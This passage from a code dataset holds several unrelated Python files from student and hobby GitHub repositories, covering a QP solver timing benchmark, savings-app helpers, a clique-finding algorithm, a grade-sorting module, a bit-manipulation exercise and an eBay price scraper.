cvxopt_matrix(-np.eye(m))\r\n h = cvxopt_matrix(np.zeros(m))\r\n A = cvxopt_matrix(y.reshape(1, -1))\r\n b = cvxopt_matrix(np.zeros(1))\r\n cvxopt_solvers.options['show_progress'] = False\r\n \r\n start = time.time()\r\n cvxopt_solvers.qp(P, q, G, h, A, b)\r\n \r\n return (time.time() - start)\r\n\r\n## Varying the Sample size:\r\n\r\nm_sizes = [50, 100, 200, 500, 1000, 2000, 3000, 4000]\r\n\r\nm_times = []\r\nfor size in m_sizes:\r\n print(\"Running on sample size %d...\" % size)\r\n m_times.append(solve_random_qp(size, 5))\r\n\r\nplt.plot(m_sizes, m_times, lw=2, marker='o')\r\nplt.grid(True)\r\nplt.xscale('log')\r\nplt.ylabel('Time (s)');\r\nplt.xlabel('Sample size m');\r\nplt.title('Time costs of the sample 
sizes');\r\n\r\n## Varying the Feature size:\r\n\r\nn_sizes = [5, 10, 20, 50, 100, 300, 500]\r\n\r\nn_times = []\r\nfor size in n_sizes:\r\n print(\"Running on feature size %d...\" % size)\r\n n_times.append(solve_random_qp(1000, size))\r\n\r\n\r\nplt.plot(n_sizes, n_times, lw=2, marker='o')\r\nplt.grid(True)\r\nplt.xscale('log')\r\nplt.ylabel('Time (s)');\r\nplt.xlabel('Feature size n');\r\nplt.title('Time costs of the feature sizes');\r\n\r\n\r\n# We can remark that varying number of samples is more time consuming than varying the number of features for this solver.\r\n","repo_name":"SayemLincoln/ML-course","sub_path":"HW 8/Problem 5 code.py","file_name":"Problem 5 code.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18810846492","text":"# from datetime import datetime\n\nWTQ = 'Wallet To Quicksave'\nQTW = 'Quicksave To Wallet'\nBTQ = 'Bank Account To Quicksave'\nQTB = 'Quicksave To Bank Account'\n\nQUICKSAVE_TRANSACTION_TYPES = [\n (WTQ, WTQ),\n (QTW, QTW),\n (BTQ, BTQ),\n (QTB, QTB)\n]\n\nWTT = 'Wallet To Targetsave'\nTTW = 'Targetsave To Wallet'\nBTT = 'Bank Account To Targetsave'\nTTB = 'Targetsave To Bank Account'\n\nTARGET_SAVE_TRANSACTION_TYPES = [\n (WTT, WTT),\n (TTW, TTW),\n (BTT, BTT),\n (TTB, TTB)\n]\n\nD = 'daily'\nW = 'weekly'\nM = 'monthly'\n\nJOINT_SAVING_FREQUENCY_TYPES = [\n (D, D),\n (W, W),\n (M, M)\n]\n\nWTJ = 'Wallet To Joint Save'\nJTW = 'Joint Save To Wallet'\n\nJOINT_SAVE_TRANSACTION_TYPES = [\n (WTJ, WTJ),\n (JTW, JTW)\n]\n\ndef check_week(date2, date1):\n date_difference = date2 - date1\n days = date_difference.days\n if days != 0:\n if days % 7 == 0:\n return days // 7\n else:\n return (days // 7) + 1\n return 1\n\ndef check_end_of_week(date2, date1):\n date_difference = date2 - date1\n days = date_difference.days\n if days != 1:\n return (days - 1) % 7 == 0\n return False\n\ndef check_end_of_month(date2, date1):\n date_difference = date2 - date1\n days = date_difference.days\n if days != 0:\n return days % 30 == 0\n return False\n\n \n# def check_days(date1, date2):\n# date_difference = date2 - date1\n# return date_difference.days\n\n\n# def check_date(date):\n# now = datetime.date(datetime.now())\n# date_difference = now - date\n# days = date_difference.days % 28\n# month = date_difference.days // 28\n# week = (month * 4) + (days // 8) + 1\n# return {'days': days, 'month': month, 'weekday': date.weekday(), 'week': week}\n","repo_name":"rajman01/investfy","sub_path":"savings/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27231243268","text":"from datetime import datetime, timedelta\nfrom time import sleep\nfrom random import choice\nfrom collections.abc import Iterator\nfrom collections.abc import Callable\nfrom dto.conjure_time_dto import LogConjureTimeDto\n\n\ndef get_seconds(config: dict[str, str]) -> Callable[[datetime], Callable]:\n \"\"\"\n Gets the difference in seconds by subtracting two time windows (data and time).\n Calculates the difference between (date time of elapsed time) and (date time given).\n\n :(path_file: str)\n\n :(start_datetime: datetime)\n\n :(list_seconds: list[int], total_epochs: int)\n\n :return \n init(start_datetime: datetime) - Initialize variables and need settings\n check_seconds(list_seconds: list[int], total_epochs: int) - Runs the check between dates\n \"\"\"\n def 
init(start_datetime: datetime) -> Callable[[list[int], int], None]:\n\n def get_seconds(end_cut: datetime, start_cut: datetime) -> int:\n return (end_cut - start_cut).seconds\n\n def finite_time_mock(seconds: list[int], total_epochs: int) -> Iterator[int]:\n\n for epoch in range(total_epochs):\n\n sleep(choice(seconds))\n\n yield epoch\n\n def log_time(log: LogConjureTimeDto) -> None:\n\n with open(config[\"path_file_log\"], 'a') as f:\n f.write(f\"{'epoch':8}:{log.epoch}\\n\")\n f.write(f\"{'seconds':8}:{log.seconds}\\n\")\n f.write(f\"{'start_cut':8}:{log.start_cut}\\n\")\n f.write(f\"{'end_cut':8}:{log.end_cut}\\n\")\n f.write(\"------------------------\\n\")\n\n def check_seconds(list_seconds: list[int], total_epochs: int) -> None:\n\n start_cut: datetime = start_datetime\n\n current_time: datetime | None = None\n seconds: int = 0\n\n for epoch in finite_time_mock(list_seconds, total_epochs):\n\n current_time = datetime.now()\n\n seconds = get_seconds(current_time, start_cut)\n\n start_cut = current_time - \\\n timedelta(seconds=seconds)\n\n log_time(LogConjureTimeDto(\n epoch, seconds, start_cut, current_time))\n\n start_cut = current_time\n\n return check_seconds\n\n return init\n","repo_name":"rodrigmars/conjure-times","sub_path":"conjure_times/core/calculate_time_core.py","file_name":"calculate_time_core.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30132776727","text":"\"\"\"\r\nfichier contenant les algos principaux \r\n\r\nauthor : gouth\r\n\r\n\"\"\"\r\n#return les noeuds communs entre l'ensemble P et U\r\n#P et U sont des ensembles\r\n#O(nlog(n)) pour le tri puis simple parcours O(n)\r\ndef inter(P,U):\r\n\tp = list(P) #set to list for sorting\r\n\tu = list(U)\r\n\tp = sorted(p)\r\n\tu = sorted(u)\r\n\r\n\ti = 0\r\n\tj = 0\r\n\r\n\tres = set()\r\n\t\r\n\t#print (\"limite de P : \", len(P))\r\n\t#print (\"limite de U : \", len(U))\r\n\r\n\twhile(i<len(p) and j<len(u)): #fin du parcours d'un des deux tableaux\r\n\t\t#print (\"i:\", i)\r\n\t\t#print (\"j;\", j)\r\n\r\n\t\tif (p[i] < u[j]):\r\n\t\t\ti+=1\r\n\t\telif (p[i] > u[j]):\r\n\t\t\tj+=1\r\n\t\telse:\r\n\t\t\tres.add(p[i])\r\n\t\t\ti+=1\r\n\t\t\tj+=1\r\n\r\n\treturn res\r\n\t\r\n#renvoie le noeud pivot candidat pour BronKerbosch\r\n#u \\ argmax card|P inter voisin(u)|\r\n#return \t-1 si pas de pivot mais devrait jamais arriver\r\n#\t\t\tid du noeud sinon\r\n#P et X object : ensemble\r\n#O(n^2log(n)) a verif\r\ndef pivot(P, X, graph):\r\n\r\n noeuds = P.union(X)\r\n assert(len(P) + len(X) >= len(noeuds))\r\n \"\"\"\r\n print (\"DEBUG :\")\r\n print_set(P, noeuds, X)\r\n \"\"\"\r\n maxi = -1 \r\n i = 0\r\n res = -1\r\n \r\n for node in noeuds: #P U X \r\n voisins = graph.get_voisins(node) #set\r\n intersect = inter(P, voisins)\r\n tmp = len(intersect)\r\n if(tmp > maxi):\r\n maxi = tmp\r\n res = node\r\n i+=1\r\n\r\n return res\r\n\r\n\r\ndef print_set(P,R,X):\r\n\tprint (\"============track============\\n\")\r\n\tprint (\"P:\", P,\"\\tR:\", R, \"\\tX:\", X)\r\n\tprint (\"-----------------------------\\n\")\r\n\r\n#algo de recherche de clique maximale\r\n# \r\ndef BronKerbosch(P, R, X, G, depth):\r\n\tprint(\"\\n\\nlevel :\", depth,\"\\n\")\r\n\t#print_set(P,R,X)\r\n\tif (len(P)== 0 and len(X)==0): #ens. 
vide\r\n\t\tprint (\"\\t\\t\\tClique found : \")\r\n\t\tprint_set({}, R, {})\r\n\t\treturn R #clique maximale\r\n\t\r\n\tu = pivot(P,X,G)\t#noeud pivot Tomita et al\r\n\tens_u = set()\t\t#set(u) in order to perform union later\t \r\n\tens_u.add(u)\r\n\tassert(len(ens_u)==1)\r\n\tvoisins = G.get_voisins(u)\r\n\tp = P.difference(voisins) \r\n\t\r\n\tassert(len(p) <= len(P))\r\n\t\r\n\tprint_set(P,R,X)\r\n\t\"\"\"\r\n\tprint (\"pivot u : \", u)\r\n\tprint (\"will itereting over \", p)\r\n\t\"\"\"\r\n\tfor node in p:\r\n\t\t#print (\"looking node :\", node, \"at level \" , depth)\t\r\n\t\tp_tmp = inter(P, voisins)\r\n\t\tR.union(ens_u) \r\n\t\t#print (\"prev X :\", X , \" inter \", voisins ,)\r\n\t\tx_tmp = inter(X, voisins)\r\n\t\t#print (\"next X : \", x_tmp)\r\n\t\tBronKerbosch(p_tmp, R, x_tmp, G, depth+1)\r\n\t\r\n\t\tP.discard(u)\r\n\t\tprev_len = len(X)\r\n\t\t#print (\"prev X\", X, \"union \", u,)\r\n\t\tX.add(u)\r\n\t\t#print (\"next X\", X) \r\n\t\tassert(len(X) == prev_len+1 or len(X) == prev_len)\r\n\r\n\r\n\r\n\r\n\t\r\n\t\r\n","repo_name":"314wind/RECHERCHE","sub_path":"algo.py","file_name":"algo.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17350574613","text":"import pickle\nimport os.path\n\n\ndef lerarquivo():\n with open(\"entrada.bin\", \"rb\") as f:\n alunos = pickle.load(f)\n notas = pickle.load(f)\n f.close()\n return alunos, notas\n\n\ndef existeArquivo():\n if (os.path.isfile('entrada.bin')):\n return True\n else:\n print(\"O arquivo não existe\")\n return False\n\n\n# Função que realiza a soma dos itens das tuplas e retorna eles\ndef maiorSoma(esquerda, direita):\n somaEsquerda = 0\n somaDireita = 0\n for i in esquerda[1:5]:\n somaEsquerda = i + somaEsquerda\n for j in direita[1:5]:\n somaDireita = j + somaDireita\n return somaEsquerda, somaDireita\n\n\n# Função que filtra os parametros de ordenação\ndef anterior(esquerda, direta, alunos):\n somaEsquerda, somaDireita = maiorSoma(esquerda, direta)\n\n # Avalia a soma da nota total\n if somaEsquerda > somaDireita:\n return True\n if somaEsquerda < somaDireita:\n return False\n\n # Caso a soma seja igual ele avalia a segunda nota\n if somaEsquerda == somaDireita:\n if esquerda[2] > direta[2]:\n return True\n if esquerda[2] < direta[2]:\n return False\n\n # Avalia o menor tempo de execução\n if esquerda[5] < direta[5]:\n return True\n if esquerda[5] > direta[5]:\n return False\n\n # Avalia a ordem alfabética\n if alunos[esquerda[0]] < alunos[direta[0]]:\n return True\n if alunos[esquerda[0]] > alunos[direta[0]]:\n return False\n\n\ndef merge(l, esquerda, direita, alunos):\n i, j, k = 0, 0, 0\n\n while i < len(esquerda) and j < len(direita):\n if anterior(esquerda[i], direita[j], alunos):\n l[k] = esquerda[i]\n i = i + 1\n else:\n l[k] = direita[j]\n j = j + 1\n k = k + 1\n\n while i < len(esquerda):\n l[k] = esquerda[i]\n i = i + 1\n k = k + 1\n\n while j < len(direita):\n l[k] = direita[j]\n j = j + 1\n k = k + 1\n\n\ndef mergeSort(l, alunos):\n if len(l) > 1:\n meio = len(l) // 2\n esquerda = l[:meio]\n direita = l[meio:]\n mergeSort(esquerda, alunos)\n mergeSort(direita, alunos)\n merge(l, esquerda, direita, alunos)\n\n return l\n\n# Função que avalia se o aluno recebe os dois pontos extras e mostra as notas.\ndef avalia2pts(l, alunos):\n cont = 0\n nota2 = l[4][2]\n tempo = l[4][5]\n for i in l:\n chave = i[0]\n soma = sum(i[1:5])\n if cont <= 5:\n soma = soma + 2\n cont = cont + 1\n if cont > 6:\n if i[2] == 
nota2 and i[5] == tempo:\n soma = soma + 2\n\n print(f\"{alunos[chave]} {soma}\")\n","repo_name":"matheustxaguiar/Programming-Period-2","sub_path":"Coursework Final/modulo.py","file_name":"modulo.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33246847157","text":"def flip_bit(n: int) -> int:\n \"\"\"\n Calculates number of consecutive 1s if user is able to flip 1 bit to 1.\n \"\"\"\n prev_len = curr_len = max_len = 0\n while (n):\n if n & 1:\n curr_len += 1\n else:\n prev_len = curr_len if n & 2 else 0\n curr_len = 0\n max_len = max(prev_len + curr_len + 1, max_len)\n n >>= 1\n return max_len\n\n\nif __name__ == \"main\":\n print(flip_bit(0b11011101111)) # 8\n print(flip_bit(0b11111101111)) # 11\n print(flip_bit(0b10101010101)) # 3\n","repo_name":"Onteri/ctci_6th_edition","sub_path":"chapter_5_bit_manipulation/python/5.3-flip_bit_to_win.py","file_name":"5.3-flip_bit_to_win.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4506532082","text":"from bs4 import BeautifulSoup\nfrom PIL import Image\nfrom urllib import request\nimport requests\nfrom csv import *\nurl= 'https://www.ebay.com/sch/i.html?_from=R40&_trksid=p2047675.m570.l1311&_nkw=crocs+classic+clog+lightning+mcqueen&_sacat=0'\npage = requests.get(url)\n\nsoup = BeautifulSoup(page.content, 'html.parser')\nlists = soup.find_all('div', class_ = 's-item__wrapper clearfix')\n# imagelists = soup.find_all('div', class_ = 's-item__image-wrapper image-treatment')\nwith open('shoes.csv', 'w', encoding='utf8', newline= '') as f:\n pen = writer(f)\n header = ['Price', 'Shipping', 'Photo']\n pen.writerow(header)\n count=1\n for list in lists: \n exception = list.find('span', class_ = 'BOLD BOLD')\n try:\n if list.find('span', class_ = 'BOLD BOLD').text.replace('\\n', '') == 'Authenticity Guarantee':\n count +=1\n try:\n price = list.find('span', class_ = 's-item__price').text.replace('\\n', '')\n print(price)\n except:\n price = None\n try:\n shipping = list.find('span', class_ = 's-item__shipping s-item__logisticsCost').text.replace('\\n', '')\n print(shipping)\n except:\n shipping = None\n if shipping == None:\n shipping = 'Free shipping'\n\n link = list.find('img', class_='s-item__image-img')\n img_url = link['src']\n img_name = 'Crocs' + str(count) + '.jpg'\n print(img_name)\n request.urlretrieve(img_url, img_name)\n #get(img_url).content\n \n picture = Image.open(img_name)\n info = [str(price), str(shipping), str(img_name)]\n pen.writerow(info)\n except:\n exception == None\n # for img in imagelists:\n # link = imagelists.find('img', class_='s-item__image-img')\n # print(img['src'])","repo_name":"RedMonk3y/Project-2","sub_path":"Ebay_Scraper.py","file_name":"Ebay_Scraper.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37580813832","text":"#!/usr/bin/env python\n\nimport difflib\nimport io\nimport json\nimport logging\nimport pathlib\nimport sys\nimport tempfile\nfrom copy import deepcopy\n\nimport click\nimport cwltool.factory\nimport cwltool.loghandler\nimport numpy as np\nimport pandas as pd\nimport untangle\nfrom shapely.geometry import MultiPolygon, Polygon, box\n\nJACCARD_SCORE_THRESHOLD = 0.9\nPIXEL_MATCH_THRESHOLD = 10\n\n# Do not log so much with cwltool\ncwltool.loghandler._logger.setLevel(logging.WARN)\n\n\ndef 
process_single(gt_file, in_file):\n print(\"processing ${gt_file} and ${in_file}\".format(gt_file=gt_file, in_file=in_file))\n overall_report = {}\n # writeableOutputFile = open(outputfile,\"w+\")\n gtXML = untangle.parse(gt_file) # open(ground_truth_file,\"r\")\n inXML = untangle.parse(in_file) # open(input_file,\"r\")\n\n if (hasattr(gtXML, \"PcGts\") and hasattr(inXML, \"PcGts\")\n and hasattr(gtXML.PcGts, \"Page\") and hasattr(inXML.PcGts, \"Page\")):\n\n matches_for_text_processing, boundingboxes_report = processBoundingboxes(\n gtXML, inXML)\n overall_report['boundingboxes'] = boundingboxes_report\n\n readingorder_report = processReadingorder(gtXML, inXML,\n matches_for_text_processing)\n overall_report['readingorder'] = readingorder_report\n\n textregion_report = processTextregions(gtXML, inXML,\n matches_for_text_processing)\n overall_report['textregions'] = textregion_report\n else:\n overall_report = {\n 'boundingboxes': {\n 'mean': np.nan,\n 'mean_merged': np.nan,\n 'nr_false_positives': np.nan,\n 'nr_false_negatives': np.nan\n },\n 'readingorder': \"\",\n 'textregions': {\n 'CER': np.nan,\n 'WER': np.nan,\n 'WER (order independent)': np.nan\n },\n }\n\n print(overall_report)\n\n return overall_report\n\n\n@click.command()\n@click.argument('gt_file', type=click.File(encoding='utf-8'))\n@click.argument('in_file', type=click.File(encoding='utf-8'))\ndef processfile(gt_file, in_file):\n report = process_single(gt_file, in_file)\n print(json.dumps(report, indent=4, sort_keys=True))\n\n\ndef processReadingorder(gtXML, inXML, matches_for_text_processing):\n report = {}\n\n if (hasattr(gtXML.PcGts.Page, 'ReadingOrder')\n and hasattr(inXML.PcGts.Page, 'ReadingOrder')\n and hasattr(gtXML.PcGts.Page.ReadingOrder, 'OrderedGroup')\n and hasattr(inXML.PcGts.Page.ReadingOrder, 'OrderedGroup')):\n # Sort Reading orders by index\n gtOrderedGroup = sorted(\n gtXML.PcGts.Page.ReadingOrder.OrderedGroup.RegionRefIndexed,\n key=lambda RegionRefIndexed: RegionRefIndexed['index'])\n inOrderedGroup = sorted(\n inXML.PcGts.Page.ReadingOrder.OrderedGroup.RegionRefIndexed,\n key=lambda RegionRefIndexed: RegionRefIndexed['index'])\n\n # Read the reading order of the Ground truth file.\n gtReadingOrder = []\n for i in range(len(gtOrderedGroup)):\n gtReadingOrder.append(gtOrderedGroup[i]['regionRef'])\n\n # Translate to the names given in the input file with help of the matched bounding boxes.\n inTranslatedReadingOrder = []\n for match in gtReadingOrder:\n if (match in matches_for_text_processing):\n inTranslatedReadingOrder.append(\n matches_for_text_processing[match])\n\n # Read the reading order of the input file.\n inReadingOrder = []\n for i in range(len(inOrderedGroup)):\n inReadingOrder.append(inOrderedGroup[i]['regionRef'])\n\n # Compare using difflib\n a = inTranslatedReadingOrder\n b = inReadingOrder\n\n s = difflib.SequenceMatcher(None, a, b)\n for tag, i1, i2, j1, j2 in s.get_opcodes():\n report = (\"%7s a[%d:%d] (%s) b[%d:%d] (%s)\" %\n (tag, i1, i2, a[i1:i2], j1, j2, b[j1:j2]))\n else:\n report = \"\"\n\n return report\n\n\ndef callCWL(gt_filename, input_filename):\n fac = cwltool.factory.Factory()\n ocrevaluation_performance = fac.make(\n \"ocrbenchmark/evaluation/ocrevaluation/ocrevaluation-performance.cwl\")\n input = {\n 'gt': {\n \"class\": \"File\",\n \"location\": pathlib.Path(gt_filename).as_uri()\n },\n 'ocr': {\n \"class\": \"File\",\n \"location\": pathlib.Path(input_filename).as_uri()\n }\n }\n return ocrevaluation_performance(**input)\n\n\ndef processTextregions(gtXML, inXML, 
matches_for_text_processing):\n frames = []\n report = {}\n\n gtRegions = getTextregions(gtXML.PcGts.Page)\n inRegions = getTextregions(inXML.PcGts.Page)\n\n # For all Ground truth text regions\n for gt_region in gtRegions:\n gt_region_id = gt_region[0]\n gt_region_text = gt_region[1].TextEquiv.Unicode.cdata\n\n # Translate the id to the input file's TextRegion id using the boundingbox data\n if (gt_region_id in matches_for_text_processing):\n inTranslatedRegionName = matches_for_text_processing[gt_region_id]\n\n # Extract the matching input file Textregion\n # Write tmp files\n gt_file = tempfile.NamedTemporaryFile(suffix='.txt')\n gt_file.write(gt_region_text.encode('utf-8'))\n\n # Writes normal and combined regions to file\n in_file = tempfile.NamedTemporaryFile(suffix='.txt')\n for in_region in inRegions:\n if (in_region[0] in inTranslatedRegionName):\n in_region_text = in_region[1].TextEquiv.Unicode.cdata\n\n in_file.write(in_region_text.encode('utf-8'))\n\n gt_file.flush()\n in_file.flush()\n\n # call OCREvaluation through CWL workflow and write input to frames\n result = callCWL(gt_file.name, in_file.name)\n data = result['global_data']['contents']\n reader = io.StringIO(data)\n\n # Extract result from csv file\n df = pd.read_csv(reader, sep=';')\n df['region_id'] = inTranslatedRegionName\n\n # Manipulate the result into a nice frame\n df = df.set_index('region_id')\n df = df.drop('doc_id', axis=1)\n\n frames.append(df)\n\n gt_file.close()\n in_file.close()\n\n if len(frames) > 0:\n df = pd.concat(frames)\n mean = df.mean(axis=0)\n report = df.transpose().to_dict()\n report['mean'] = mean.to_dict()\n else:\n report = {\n 'mean': {\n 'CER': np.nan,\n 'WER': np.nan,\n 'WER (order independent)': np.nan\n }\n }\n\n return report\n\n\ndef processBoundingboxes(gtXML, inXML):\n report = {}\n matches_for_text_processing = {}\n\n gtPolygons = getPolygons(gtXML.PcGts.Page)\n inPolygons = getPolygons(inXML.PcGts.Page)\n\n gtBounds = {}\n inBounds = {}\n\n for tr_id, polygon in gtPolygons:\n gtBounds[tr_id] = box(*polygon.bounds)\n for tr_id, polygon in inPolygons:\n inBounds[tr_id] = box(*polygon.bounds)\n\n # Search for and get all of the direct matches. 
gtBounds_copy and inBounds_copy will house the remaining entries only.\n gtBounds_copy, inBounds_copy, matches_singles, score_singles = matchPolygonsAndRemove(\n gtBounds, inBounds)\n report['matches'] = matches_singles\n report['mean'] = score_singles\n\n # All things that are left in the input might (in combination) match with items in the ground truth, so we create unions where the\n # boundaries are within a threshold value on one border and follow one another in the Y direction (aka are underneath eachother),\n # these are 'merged' matches.\n for in_id_a, in_box_a in gtBounds_copy.items():\n for in_id_b, in_box_b in inBounds_copy.items():\n if in_id_a != in_id_b:\n (minx_a, miny_a, maxx_a, maxy_a) = in_box_a.bounds\n (minx_b, miny_b, maxx_b, maxy_b) = in_box_b.bounds\n\n # Check the vertical only\n if abs(maxy_b - miny_a) < PIXEL_MATCH_THRESHOLD and \\\n abs(minx_b - minx_a) < PIXEL_MATCH_THRESHOLD and \\\n abs(maxx_b - maxx_a) < PIXEL_MATCH_THRESHOLD:\n\n inBounds_copy[in_id_b + ','\n + in_id_a] = in_box_a.union(in_box_b)\n del inBounds_copy[in_id_a]\n del inBounds_copy[in_id_b]\n\n # The compounded boxes are now matched with the remaining boxes in the ground truth file.\n # gtBounds_rest and inBounds_rest will house the remaining entries only.\n gtBounds_rest, inBounds_rest, matches_merged, score_merged = matchPolygonsAndRemove(gtBounds_copy, inBounds_copy)\n report['matches_merged'] = matches_merged\n report['mean_merged'] = score_merged\n\n # Record the remaining entries\n report['false_negatives'] = list(gtBounds_rest.keys())\n report['false_positives'] = list(inBounds_rest.keys())\n\n for match in report['matches']:\n matches_for_text_processing[match] = report['matches'][match]['id']\n for match in report['matches_merged']:\n matches_for_text_processing[match] = report['matches_merged'][match]['id']\n\n return matches_for_text_processing, report\n\n\ndef matchPolygonsAndRemove(gtBounds, inBounds):\n matches = {}\n final_scores = []\n\n gtBounds_copy = deepcopy(gtBounds)\n inBounds_copy = deepcopy(inBounds)\n\n for gt_id, gt_box in gtBounds.items(): \n scores = [] \n for _, in_box in inBounds.items():\n score = jaccard_index_multipolygons(gt_box, in_box)\n scores.append(score)\n\n max_index = np.argmax(scores)\n\n if scores[max_index] > JACCARD_SCORE_THRESHOLD:\n match_id = list(inBounds.keys())[max_index]\n\n del inBounds_copy[match_id]\n del gtBounds_copy[gt_id]\n\n matches[gt_id] = {'id': match_id, 'score': scores[max_index]}\n final_scores.append(scores[max_index])\n\n final_score = np.average(final_scores)\n # if (len(matches) > 0):\n # final_score = np.sum(scores) / len(matches)\n\n return (gtBounds_copy, inBounds_copy, matches, final_score)\n\n\ndef processLayout(gtXML, inXML):\n gtPolygons = getPolygons(gtXML.PcGts.Page)\n inPolygons = getPolygons(inXML.PcGts.Page)\n\n gtLayout = {}\n inBounds = {}\n\n for tr_id, polygon in gtPolygons:\n gtLayout[tr_id] = polygon\n for tr_id, polygon in inPolygons:\n inBounds[tr_id] = polygon\n\n gtLayout_copy = deepcopy(gtLayout)\n\n for gt_id, gt_box in gtLayout.items():\n scores = []\n for _, in_box in inBounds.items():\n score = jaccard_index_multipolygons(gt_box, in_box)\n scores.append(score)\n\n max_index = np.argmax(scores)\n\n if scores[max_index] > JACCARD_SCORE_THRESHOLD:\n match_id = list(inBounds.keys())[max_index]\n\n del inBounds[match_id]\n del gtLayout_copy[match_id]\n print('\"{gt_id}\" matched with \"{in_id}\" with score {score}'.format(\n in_id=match_id, gt_id=gt_id, score=scores[max_index]))\n\n for in_id, in_box in 
inBounds.items():\n print('Input \"{in_id}\" did not match anything'.format(in_id=in_id))\n\n for (gt_id, gt_box) in gtLayout_copy.items():\n print('Ground Truth \"{gt_id}\" did not match anything'.format(\n gt_id=gt_id))\n\n\ndef getPolygons(Page):\n polygons = []\n if hasattr(Page, 'TextRegion'):\n for TextRegion in Page.TextRegion:\n pointslist = []\n for Point in TextRegion.Coords.Point:\n x = int(Point['x'])\n y = int(Point['y'])\n pointslist.append((x, y))\n\n polygon = Polygon(pointslist)\n polygons.append((TextRegion['id'], polygon))\n\n return polygons\n\n\ndef getTextregions(Page):\n textregions = []\n if hasattr(Page, 'TextRegion'):\n for TextRegion in Page.TextRegion:\n textregions.append((TextRegion['id'], TextRegion))\n\n return textregions\n\n\ndef jaccard_index_multipolygons(truth_multi, predicted_multi):\n if not (truth_multi.is_valid):\n raise ('The truth multipolygon is not valid!')\n if not (predicted_multi.is_valid):\n raise ('The predicted multipolygon is not valid!')\n\n # intersection\n intersec = truth_multi.intersection(predicted_multi).area\n # union\n union = truth_multi.union(predicted_multi).area\n\n # Jaccard index is intersection over union\n return intersec / union\n\n\nif __name__ == '__main__':\n processfile()\n","repo_name":"EYRA-Benchmark/ocr-benchmark","sub_path":"evaluation/ocrbenchmark/evaluation/evaluate_single.py","file_name":"evaluate_single.py","file_ext":"py","file_size_in_byte":12700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"5809557449","text":"import json\nimport os\nimport numpy as np\nimport tables\nimport warnings\n\nfrom tierpsy.analysis.ske_filt.getFilteredSkels import _h_calAreaSignedArray\nfrom tierpsy.helper.params import read_ventral_side, single_db_ventral_side\n\n\nVALID_CNT = ['clockwise', 'anticlockwise', 'unknown']\n\ndef _add_ventral_side(skeletons_file, ventral_side=''):\n #I am giving priority to a contour stored in experiments_info, rather than one read by the json file.\n #currently i am only using the experiments_info in the re-analysis of the old schafer database\n try:\n ventral_side_f = single_db_ventral_side(skeletons_file)\n except (tables.exceptions.NoSuchNodeError, KeyError):\n ventral_side_f = ''\n\n if ventral_side_f in VALID_CNT:\n if not ventral_side or (ventral_side == ventral_side_f):\n ventral_side = ventral_side_f\n else:\n raise ValueError('The given contour orientation ({}) and the orientation stored in /experiments_info group ({}) differ. 
Change /experiments_info or the parameters file to solve this issue.'.format(ventral_side, ventral_side_f) )\n\n #add ventral side if given\n if ventral_side in VALID_CNT:\n with tables.File(skeletons_file, 'r+') as fid:\n fid.get_node('/trajectories_data').attrs['ventral_side'] = ventral_side\n return ventral_side\n\ndef _switch_cnt(skeletons_file):\n with tables.File(skeletons_file, 'r+') as fid:\n # since here we are changing all the contours, let's just change\n # the name of the datasets\n side1 = fid.get_node('/contour_side1')\n side2 = fid.get_node('/contour_side2')\n\n side1.rename('contour_side1_bkp')\n side2.rename('contour_side1')\n side1.rename('contour_side2')\n\ndef isBadVentralOrient(skeletons_file, ventral_side=''):\n print(ventral_side)\n ventral_side = _add_ventral_side(skeletons_file, ventral_side) \n if not ventral_side in VALID_CNT:\n return True\n\n elif ventral_side == 'unknown':\n is_bad = False\n \n elif ventral_side in ['clockwise', 'anticlockwise']:\n with tables.File(skeletons_file, 'r') as fid:\n has_skeletons = fid.get_node('/trajectories_data').col('has_skeleton')\n\n # let's use the first valid skeleton, it seems like a waste to use all the other skeletons.\n # I checked earlier to make sure the have the same orientation.\n\n valid_ind = np.where(has_skeletons)[0]\n if valid_ind.size == 0:\n #no valid skeletons, nothing to do here.\n is_bad = True\n else:\n cnt_side1 = fid.get_node('/contour_side1')[valid_ind[0], :, :]\n cnt_side2 = fid.get_node('/contour_side2')[valid_ind[0], :, :]\n A_sign = _h_calAreaSignedArray(cnt_side1, cnt_side2)\n \n # if not (np.all(A_sign > 0) or np.all(A_sign < 0)):\n # raise ValueError('There is a problem. All the contours should have the same orientation.')\n if ventral_side == 'clockwise':\n is_bad = A_sign[0] < 0\n elif ventral_side == 'anticlockwise':\n is_bad = A_sign[0] > 0\n else:\n raise ValueError\n\n if is_bad:\n _switch_cnt(skeletons_file)\n is_bad = False\n\n\n return is_bad\n\ndef ventral_orient_wrapper(func, skel_f, ventral_side, *args, **argkws):\n if isBadVentralOrient(skel_f, ventral_side):\n raise ValueError('Cannot continue the ventral side {} given is empty or incorrect'.format(ventral_side))\n return func(*args, **argkws)\n \n\n\n\ndef isGoodVentralOrient(skeletons_file, ventral_side=''):\n return not isBadVentralOrient(skeletons_file, ventral_side=ventral_side)\n\n \n","repo_name":"ver228/tierpsy-tracker","sub_path":"tierpsy/analysis/contour_orient/correctVentralDorsal.py","file_name":"correctVentralDorsal.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"78"} +{"seq_id":"40310477875","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom .views import test, question_list, question_detail, popular\n\n# urlpatterns = [\n# url(r'^$', test, name='index'),\n# url(r'^login/.*$', test, name='login'),\n# url(r'^signup/.*', test, name='signup'),\n# url(r'^question/(?P<id>[0-9]+)/$', test, name='question'),\n# url(r'^ask/.*', test, name='ask'),\n# url(r'^popular/.*', test, name='popular'), \n# 